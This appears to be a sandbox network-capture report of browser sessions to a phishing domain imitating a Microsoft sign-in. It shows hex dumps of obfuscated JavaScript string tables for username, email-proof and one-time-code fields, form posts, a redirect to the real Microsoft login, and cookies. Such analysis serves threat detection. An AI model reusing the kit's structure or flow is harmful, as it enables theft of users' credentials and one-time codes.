                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 2d 62 75 74 74 6f 6e 2d 74 65 78 74 27 2c 27 68 61 73 41 74 74 72 69 62 75 74 65 27 2c 27 74 69 6c 65 74 69 74 6c 65 27 2c 27 64 69 76 27 2c 27 69 6e 70 5f 75 6e 61 6d 65 27 2c 27 66 6f 72 45 61 63 68 27 2c 27 67 65 74 27 2c 27 69 50 72 6f 6f 66 45 6d 61 69 6c 27 2c 27 23 62 74 6e 5f 62 61 63 6b 27 2c 27 3c 2f 61 3e 27 2c 27 64 61 74 61 2d 69 64 27 2c 27 62 75 74 74 6f 6e 2e 73 68 6f 77 2d 68 69 64 65 2d 62 74 6e 27 2c 27 73 63 72 69 70 74 5b 73 72 63 5e 3d 5c 78 32 32 27 2c 27 70 6f 73 69 74 69 6f 6e 27 2c 27 70 6f 70 27 2c 27 73 65 63 74 69 6f 6e 5f 75 6e 61 6d 65 27 2c 27 4e 65 78 74 27 2c 27 69 45 6e 74 65 72 50 72 6f 6f 66 44 65 73 63 27 2c 27 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 27 2c 27 68 74 74 70 73 3a 2f 2f 68 74 74 70 62 69 6e
                                                                                                                          Data Ascii: -button-text','hasAttribute','tiletitle','div','inp_uname','forEach','get','iProofEmail','#btn_back','</a>','data-id','button.show-hide-btn','script[src^=\x22','position','pop','section_uname','Next','iEnterProofDesc','.loading-container','https://httpbin
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 6f 6d 70 6c 65 74 65 3d 5c 78 32 32 6f 66 66 5c 78 32 32 5c 78 32 30 74 79 70 65 3d 5c 78 32 32 65 6d 61 69 6c 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6e 61 6d 65 3d 5c 78 32 32 69 50 72 6f 6f 66 45 6d 61 69 6c 5c 78 32 32 5c 78 32 30 6d 61 78 6c 65 6e 67 74 68 3d 5c 78 32 32 31 31 33 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 5c 78 32 32 74 72 75 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 6c 61 62 65 6c 3d 5c 78 32 32 45 6d 61 69 6c 5c 78 32 30 6e 61 6d 65 5c 78 32 32 5c 78 32 30 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 5c 78 32 32 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                                          Data Ascii: omplete=\x22off\x22\x20type=\x22email\x22\x20id=\x22iProofEmail\x22\x20name=\x22iProofEmail\x22\x20maxlength=\x22113\x22\x20aria-required=\x22true\x22\x20aria-label=\x22Email\x20name\x22\x20aria-describedby=\x22iProofInputError\x22>\x0a\x20\x20\x20\x20\x2
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 27 2c 27 73 68 6f 77 2d 66 72 6f 6d 2d 6c 65 66 74 5c 78 32 30 27 2c 27 23 6d 61 69 6e 4c 6f 61 64 65 72 27 2c 27 63 6f 6c 6f 72 27 2c 27 6d 65 73 73 61 67 65 27 2c 27 74 6f 67 67 6c 65 27 2c 27 39 38 35 76 61 4b 5a 43 57 27 2c 27 73 65 63 74 69 6f 6e 5f 6f 74 70 27 2c 27 68 74 74 70 73 3a 2f 2f 69 70 61 70 69 2e 63 6f 2f 27 2c 27 66 6f 72 27 2c 27 69 6e 70 5f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 27 2c 27 53 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 61 6e 6f 74 68 65 72 5c 78 32 30 77 61 79 27 2c 27 62 6f 64 79 27 2c 27 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 27 2c 27 6d 75 6c 74 69 70 6c 65 61 63 63 6f 75 6e 74 6f 70 74 69 6f 6e 73 27 2c 27 32 66 61 5c 78 32 30 69 73 5c 78 32 30 6f 6e 27 2c 27 65 6d 61 69 6c 27 2c 27 74 65 6c 27 2c 27
                                                                                                                          Data Ascii: ','show-from-left\x20','#mainLoader','color','message','toggle','985vaKZCW','section_otp','https://ipapi.co/','for','inp_confirmemail','Sign\x20in\x20another\x20way','body','linkoptionclick(this)','multipleaccountoptions','2fa\x20is\x20on','email','tel','
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 63 61 74 69 6f 6e 27 2c 27 65 72 72 6f 72 5f 6f 74 70 27 2c 27 6e 6f 6e 65 27 2c 27 67 6f 64 61 64 64 79 65 6d 61 69 6c 27 2c 27 6d 61 78 4c 65 6e 67 74 68 27 2c 27 73 65 63 74 69 6f 6e 73 5f 70 64 66 27 2c 27 65 6e 74 65 72 6f 74 70 27 2c 27 72 6f 77 5c 78 32 30 74 69 6c 65 27 2c 27 74 72 75 65 27 2c 27 34 36 37 30 75 4f 47 55 64 48 27 2c 27 73 65 6c 65 63 74 70 72 6f 74 65 63 74 6f 70 74 69 6f 6e 28 74 68 69 73 29 27 2c 27 3c 70 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6d 62 2d 31 36 5c 78 32 32 3e 27 2c 27 62 6c 61 6e 6b 27 2c 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 64 69 76 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 74 65 78 74 2d 62 6c 6f 63 6b 2d 62 6f 64 79 5c 78 32 32 5c 78 32 30 69 64 3d 5c 78 32
                                                                                                                          Data Ascii: cation','error_otp','none','godaddyemail','maxLength','sections_pdf','enterotp','row\x20tile','true','4670uOGUdH','selectprotectoption(this)','<p\x20class=\x22mb-16\x22>','blank','\x0a\x20\x20\x20\x20\x20\x20<div\x20class=\x22text-block-body\x22\x20id=\x2
                                                                                                                          2024-04-17 00:34:51 UTC1369INData Raw: 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 27 2c 27 5c 78 32 32 5c 78 32 30 6f 6e 63 6c 69 63 6b 3d 5c 78 32 32 6c 69 6e 6b 6f 70 74 69 6f 6e 63 6c 69 63 6b 28 74 68 69 73 29 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6c 69 6e 6b 5c 78 32 32 3e 27 2c 27 2e 62 61 6e 6e 65 72 6c 6f 67 6f 27 2c 27 70 61 72 73 65 27 2c 27 69 50 72 6f 6f 66 49 6e 70 75 74 45 72 72 6f 72 27 2c 27 2c 5c 78 32 30 61 6e 64 5c 78 32 30 74 68 65 6e 5c 78 32 30 63 6c 69 63 6b 5c 78 32 30 5c 78 32 32 53 65 6e 64 5c 78 32 30 63 6f 64 65 5c 78 32 32 5c 78 32 30 74 6f 5c 78 32 30 72 65 63 65 69 76 65 5c 78 32 30 79 6f 75 72 5c 78 32 30 63 6f 64 65 2e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30
                                                                                                                          Data Ascii: o\x20receive\x20your\x20code.','\x22\x20onclick=\x22linkoptionclick(this)\x22\x20class=\x22link\x22>','.bannerlogo','parse','iProofInputError',',\x20and\x20then\x20click\x20\x22Send\x20code\x22\x20to\x20receive\x20your\x20code.\x0a\x20\x20\x20\x20\x20\x20


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.449789104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:50 UTC1542OUTPOST /sqpKuPasEkRjZVcYlD9tzoTs6U9MaxM01XQQUbYMcX05n1w HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 35
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Accept: */*
                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:50 UTC35OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 77 33 69 38 6a 62 79 71 6b 68 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                                                                                          Data Ascii: pagelink=w3i8jbyqkh&type=4&appnum=1
                                                                                                                          2024-04-17 00:34:52 UTC1103INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:51 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache, private
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zpIoyUiNzyrPv08W6B%2FuRiaBvVwIfarXE6LbMFGT%2F5kE%2FAKMSih2akMVCB3FpiB56AnKOfwNYwbHp%2B%2FOQ546eBMxyq%2F39wL0YrZjtl0rmx5U7jDwEcW5v%2Bpatde3UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; expires=Wed, 17-Apr-2024 02:34:51 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                          2024-04-17 00:34:52 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 64 50 4f 45 70 46 62 45 73 31 4b 33 4e 70 4e 6b 70 6e 56 55 4e 6f 57 6d 4e 73 63 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 69 74 30 52 31 70 46 55 6b 30 78 53 6c 52 44 56 58 5a 43 53 47 31 6c 54 6d 51 79 64 46 56 61 4c 32 39 49 4f 54 56 71 4e 45 46 34 52 31 42 7a 5a 54 6c 43 57 56 56 4b 54 54 68 76 4e 55 64 6a 4f 47 35 70 63 6c 64 55 59 6e 64 59 62 57 63 33 57 46 52 71 4d 57 5a 49 5a 45 51 76 5a 57 59 32 62 58 4a 45 64 46 68 7a 61 31 42 74 64 6e 42 73 51 7a 5a 4a 61 55 74 34 4d 33 56 73 65 55 67 7a 4c 31 46 76 4f 57 59 78 61 6d 5a 6a 65 54 4d 72 51 55 35 6e 4d 54 42 74 4e 57 63 72 56 44 68 73 55 47 31 61 56 58 64 56 52 54 6b
                                                                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTk
                                                                                                                          2024-04-17 00:34:52 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                                                                                          Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                                                                                          2024-04-17 00:34:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          42192.168.2.449790104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:50 UTC1484OUTGET /mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:51 UTC784INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:51 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tGDhjUWWYgoF3EyqH%2Fe%2FAN9MfdmtYHma6Qy9fXKslVOD%2FxJq7DM%2BWAbliuqHM150XMBZKAIrH%2F35otO4xqnv4Nii%2BvxngLU3XmonTAo2Umto9LF%2FeJKrlcMruVe%2F2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854eaefa553e5-ATL
                                                                                                                          2024-04-17 00:34:51 UTC585INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                                                                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                                                                          2024-04-17 00:34:51 UTC1286INData Raw: 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 36 35 2e 38 20 31 32 31 35 2e 36 63 36 39 30 2e 32 34 36 20 30 20 31 32 34 39 2e 38 2d 34 35 35 2e 35 39 35 20 31 32 34 39 2e 38 2d 31 30 31 37 2e 36 53 39 35 36 2e 30 34 36 2d 38 31 39 2e 36 20 32 36 35 2e 38 2d 38 31 39 2e 36 2d 39 38 34 2d 33 36 34 2e 30 30 35 2d 39 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66
                                                                                                                          Data Ascii: "/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransf
                                                                                                                          2024-04-17 00:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          43192.168.2.449791104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:51 UTC1469OUTGET /klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:52 UTC757INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:52 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m3bTDwe28%2F6YMWMJnmggHPJ0fKTiKcrH8Vn1dWg%2FCH5p1B4EKTmgVztBHBe6V7xEV8LekHB1Y5OwYnLqc6t9vm6NjCKYeX3eZ80cSmg7X7d2J%2BIEFZ4vnJu25Tt8%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854efa9b3add5-ATL
                                                                                                                          2024-04-17 00:34:52 UTC612INData Raw: 35 37 38 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1
                                                                                                                          Data Ascii: 578PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?
                                                                                                                          2024-04-17 00:34:52 UTC795INData Raw: 09 96 34 f5 90 bf c8 41 fa 3e ce aa d1 58 f0 9d 61 2f f4 19 10 30 4e 2e 26 3f 71 f4 eb ee c9 c5 fd bd b3 e8 0b 46 23 77 26 6f 88 22 4c 3a 96 b2 e8 6c 0e 63 cc 86 e0 ac 8e 9a 78 bb 50 ea 86 ee d1 90 40 65 d2 0b 26 01 26 7c 59 a0 10 ac 21 e8 8f 69 d1 f4 00 ee 67 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d
